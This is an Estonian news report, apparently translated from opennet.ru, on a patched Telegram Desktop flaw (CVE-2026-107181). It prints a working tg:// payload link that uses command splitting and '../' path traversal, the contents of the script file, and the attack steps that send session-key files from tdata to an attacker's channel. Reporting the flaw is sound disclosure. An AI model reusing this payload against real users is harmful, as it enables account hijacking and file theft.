Selgusid üksikasjad ja meetod haavatavuse (CVE-2026-107181) ärakasutamiseks Telegram Desktopis, ametlikus Telegrami kliendis lauaarvutitele. Probleem tuleneb ebapiisavast mittevahetatud eraldusmärkide töötlemisest IPC käskudes, mis võimaldas ründajal klikkimisel saadetud lingile edastada ohvri süsteemist ründajale kõiki faile, sealhulgas seansivõtmete faile, mida saaks kasutada Telegrami konto haaramiseks. Haavatavus on parandatud Telegram Desktopi väljalaskes 7.2.9.
Linkidele «tg://» klikkides käivitab operatsioonisüsteem vastava rakenduse Telegram Desktop. Kui süsteemis on juba käimas teine käivitus selle rakenduse jaoks, edastab käivitatud protsess lingi IPC liidese kaudu sokli kaudu. Probleem seisneb selles, et kui lingi parameetrite seas on kasutatud märk ';' (näiteks «tg://x?a=1;OPEN...»), jaguneb sisu ja selle järel olevad osad töödeldakse eraldi käskudena.
Rünnaku toimeks on käsk OPEN koos URI skeemiga «interpret:», mis on mõeldud skriptide käivitamiseks IPC kaudu, mida kasutati uusversioonide automaatseks saatmiseks kanalitesse. Skript on ettenähtud lokaalne fail, milles on märgitud saadetav fail kanalisse ja kanali identifikaator. Failitee skriptidele töödeldakse suhteliselt teenindava alamkausta, kuid puhtuse puudumine «.. /» failiteedes võimaldab ründajal pöörduda failide poole, mis on salvestatud põhi kataloogist väljaspool. Näiteks võib fail laadida oma telegrammi gruppi ja seejärel viidata sellele failile skriptina, valmistades lingi, mis on selline:
tg://x?a=1;OPEN:interpret:../../../Downloads/Telegram%20Desktop/instructions.txt
Rünnaku etapid:
- Ründaja lisab ohvri oma gruppi (vaikeseade kohaselt lisamine ei nõua lisatava kinnitamist) ja saadab sellesse gruppi tekstifaili, milles on märgitud kanal ja tee skriptini. Telegram salvestab selle faili ettenähtud süsteemse alamkausta, kui ohver pärast ründaja rühmas viibimist sinna siseneb.
channel: 2005234537
file: tdata/D877F783D5D3EF8Cs - Ründaja saadab ohvrile süütuna näiva lingi oma hostile (näiteks «https://coolsite.org»), mis avaneb suunamise kaudu serveris ründajale asendatakse URI kujul ‘tg://x?a=1;OPEN:interpret:…;OPEN:interpret:….
- Linki klikimisel kutsub brauser esile URI töötleja «tg://», mis käivitab ülalnimetatud käskude käivitamise ahela, viies faili saatmiseni ründaja kanali kaudu ilma ükskõiksete teadete või saatmise kinnituse taotlemiseta.
- Saades faile tdata alamkaustast koos krüpteerimis- ja autoriseerimisvõtmetega, saab ründaja, ilma et kasutaja oleks seadnud kohaliku parooli, kloonida ohvri ühend seanssi oma seadmes.
Allikas: opennet.ru
